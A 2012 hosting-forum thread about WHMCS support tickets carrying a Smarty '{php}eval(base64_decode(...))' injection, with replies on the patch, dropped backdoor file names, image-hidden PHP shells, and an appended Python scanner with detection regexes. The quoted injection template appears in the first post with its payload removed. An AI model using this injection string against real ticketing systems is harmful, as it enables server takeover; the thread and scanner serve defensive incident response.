  #1  
Old 01-16-2012, 03:36 PM
naushad naushad is offline
Junior Croc
 
Join Date: Aug 2007
Posts: 103
Exclamation strange tickets (hack attempts?)

Hi all,
I receive support and sales tickets through my WHMCS usually. I have the latest version of WHMCS. For a few days, I have been receiving strange tickets. I am copying them here now. I want to know what exactly it means and, of course, what I should do to avoid them?

gggg
ggggggggggggggggggg@hotmail.com

15/01/2012 06:16 {php}eval(base64_decode('[base64 payload removed]'));{/php}

----------------------------
IP Address: 178.80.183.1
  #2  
Old 01-16-2012, 05:51 PM
striddy striddy is offline
Veteran Croc
 
Join Date: Mar 2008
Location: /home/australia/earth
Posts: 4,093
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by naushad View Post
Hi all,
I receive support and sales tickets through my WHMCS usually. I have the latest version of WHMCS. For a few days, I have been receiving strange tickets. I am copying them here now. I want to know what exactly it means and, of course, what I should do to avoid them?
Please don't post the exploit code. By posting the code, you are making this exploit available to other skiddies to use.

Please edit your post and remove the exploit code.

This exploit has been discussed for months at the whmcs forum. There is much information available at forum.whmcs.com on this topic. I suggest you visit that forum.

If you applied the patch that was made available some months back prior to these hack attempts, you are ok. If you didn't apply it, you have likely been hacked. See forum.whmcs.com for details.
__________________
- David
  #3  
Old 01-16-2012, 07:52 PM
eLIANT eLIANT is offline
King Croc
 
Join Date: Apr 2005
Posts: 1,075
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by freeman View Post
OK. I removed...
Striddy was talking to the original poster.
__________________

eLIANT Technology Services
(site feedback welcome)
  #4  
Old 01-16-2012, 09:31 PM
freeman freeman is offline
Swamp Croc
 
Join Date: Jan 2006
Location: Montreal, QC, Canada
Posts: 308
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by eLIANT View Post
Striddy was talking to the original poster.
Thanks I didn't see it. I just wanted to show others what the file contains.

Regards,
George B.
  #5  
Old 01-17-2012, 04:35 AM
striddy striddy is offline
Veteran Croc
 
Join Date: Mar 2008
Location: /home/australia/earth
Posts: 4,093
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by freeman View Post
Thanks I didn't see it. I just wanted to show others what the file contains.

Regards,
George B.
George, I understand you are just trying to be helpful.

Showing exploit code to complete strangers is unfortunately a bad idea. You are essentially giving someone the knowledge of how to hack... possibly thousands of sites. It is perhaps better to describe what an exploit can do in general terms instead of publicly showing how to do it.
__________________
- David
  #6  
Old 01-17-2012, 09:30 AM
freeman freeman is offline
Swamp Croc
 
Join Date: Jan 2006
Location: Montreal, QC, Canada
Posts: 308
Cool Re: strange tickets (hack attempts?)

Quote:
Originally Posted by striddy View Post
George, I understand you are just trying to be helpful.

Showing exploit code to complete strangers is unfortunately a bad idea. You are essentially giving someone the knowledge of how to hack... possibly thousands of sites. It is perhaps better to describe what an exploit can do in general terms instead of publicly showing how to do it.
This is an old way to hack, using PHP base64 or PHP shell. I am sure HostGator has control over this, to block all those exploits.

When you are on dedicated services (like a dedicated server) you are on your own. You have to take control of whatever is uploaded to the server. If you are doing paid web hosting, the problems are not so many, maybe with some outdated software (WordPress, Joomla etc.), and you have to force the users to update their installed software. But when you are doing free web hosting it is another thing, more complicated and with more problems (if you don't have control). If you don't pay attention to your server logs, what users are doing etc., soon your server IP will be blacklisted, and almost every major web host will block emails from any blacklisted IP.

I can talk about this for hours because I did free webhosting and I have seen a lot of things.

One small example is a PHP script hidden in an image file. The abuser uploads the image file (jpg, png etc.) and you'll say there is no problem, but hidden inside this image is in fact a PHP shell, which can be a short way to a server overload or, worse, a hack.

So, what I'll suggest is never trust a user (if his email is coming from a free provider, his info sounds fake) and, most important, check your logs. I am talking here about dedicated services.

Another thing, In my opinion there is not a real interest to stop abusers, big companies are doing nice money from server setup, anti-spam configurations etc.


Regards,
George B.

Last edited by freeman; 01-17-2012 at 09:41 AM.
  #7  
Old 01-17-2012, 11:57 PM
striddy striddy is offline
Veteran Croc
 
Join Date: Mar 2008
Location: /home/australia/earth
Posts: 4,093
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by freeman View Post
This is an old way to hack, using PHP base64 or PHP shell. I am sure HostGator has control over this, to block all those exploits.
George, this is a current hack for WHMCS, which has caused problems for many sites. It is not an old hack.
__________________
- David
  #8  
Old 01-18-2012, 06:51 AM
freeman freeman is offline
Swamp Croc
 
Join Date: Jan 2006
Location: Montreal, QC, Canada
Posts: 308
Smile Re: strange tickets (hack attempts?)

Quote:
Originally Posted by striddy View Post
George, this is a current hack for WHMCS, which has caused problems for many sites. It is not an old hack.
Just search on Google: "php base64 exploit" and you'll see that this is an old exploit. One example is here: http://forums.oscommerce.com/topic/3...base64-decode/

If you configure your mod_sec to block this, it is not a problem.

Regards,
George B.

Last edited by freeman; 01-18-2012 at 06:56 AM.
  #9  
Old 01-26-2012, 04:50 PM
zomex zomex is offline
Swamp Croc
 
Join Date: Apr 2011
Posts: 245
Default Re: strange tickets (hack attempts?)

Hello,

This code is an exploit for which WHMCS made a patch over a month ago. If you've installed the patch you'll be safe, but it won't stop people trying it.

This exploit was specific to Smarty, which is the template system WHMCS is built with. It also affected a close competitor, Hostbillapp.com.

I've helped a lot of people who've been hacked as a result of this. If you're unsure whether you've been hacked or not, common files that I've seen uploaded by the hackers use names such as

red.php
0.php
indexx.php

If you do find out that you've been hacked there is a good post on the WHMCS forums that explains what to do.

Jack
  #10  
Old 01-26-2012, 05:03 PM
zomex zomex is offline
Swamp Croc
 
Join Date: Apr 2011
Posts: 245
Default Re: strange tickets (hack attempts?)

Quote:
Originally Posted by freeman View Post
Just search on Google: "php base64 exploit" and you'll see that this is an old exploit. One example is here: http://forums.oscommerce.com/topic/3...base64-decode/

If you configure your mod_sec to block this, it is not a problem.

Regards,
George B.
I second striddy on this. I don't think this is the same in any way other than the hackers using PHP Eval to encode their PHP.

The hack is a result of WHMCS previously allowing PHP to be executed in support tickets using {php} {/php}

A lot of people from a mix of hosting companies have been hacked which could have been avoided by simply installing WHMCS's security patch.
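A defender-side check built from what posts #9 and #10 describe, added here as an example that is not part of the thread or of WHMCS itself: it flags ticket bodies that carry Smarty {php} tags or an eval(base64_decode( wrapper, and walks a directory for the upload names listed in post #9. The ticket records, IP addresses and function names are constructed for illustration.

```python
import os
import re

# Smarty {php} / {/php} block tags, which post #10 says were executed from ticket text.
SMARTY_PHP_TAG = re.compile(r"\{\s*/?\s*php\s*\}", re.IGNORECASE)
# eval() wrapped directly around base64_decode(), the wrapper seen in the quoted ticket.
EVAL_BASE64 = re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
# File names post #9 reports seeing uploaded after a compromise.
SUSPECT_NAMES = {"red.php", "0.php", "indexx.php"}

# Constructed sample tickets (documentation IPs, harmless payload).
TICKETS = [
    {"id": 101, "ip": "192.0.2.10", "body": "My invoice total looks wrong, can you check?"},
    {"id": 102, "ip": "192.0.2.77",
     "body": "{php}eval(base64_decode('Y29uc3RydWN0ZWQ='));{/php}"},
    {"id": 103, "ip": "192.0.2.78", "body": "Does base64_decode work on your PHP build?"},
]


def scan_ticket(body):
    """Return the indicator names found in one ticket body."""
    findings = []
    if SMARTY_PHP_TAG.search(body):
        findings.append("smarty-php-tag")
    if EVAL_BASE64.search(body):
        findings.append("eval-base64")
    return findings


def flag_tickets(tickets):
    """Map ticket id -> findings for every ticket with at least one indicator."""
    flagged = {}
    for t in tickets:
        hits = scan_ticket(t["body"])
        if hits:
            flagged[t["id"]] = hits
    return flagged


def find_suspect_files(root):
    """Walk root and list relative paths whose file name is in SUSPECT_NAMES."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in SUSPECT_NAMES:
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


if __name__ == "__main__":
    print(flag_tickets(TICKETS))
    print(find_suspect_files("."))
```

A flagged ticket only shows that someone tried; as post #9 says, a patched install still receives these tickets, so the file check is what indicates whether an attempt succeeded.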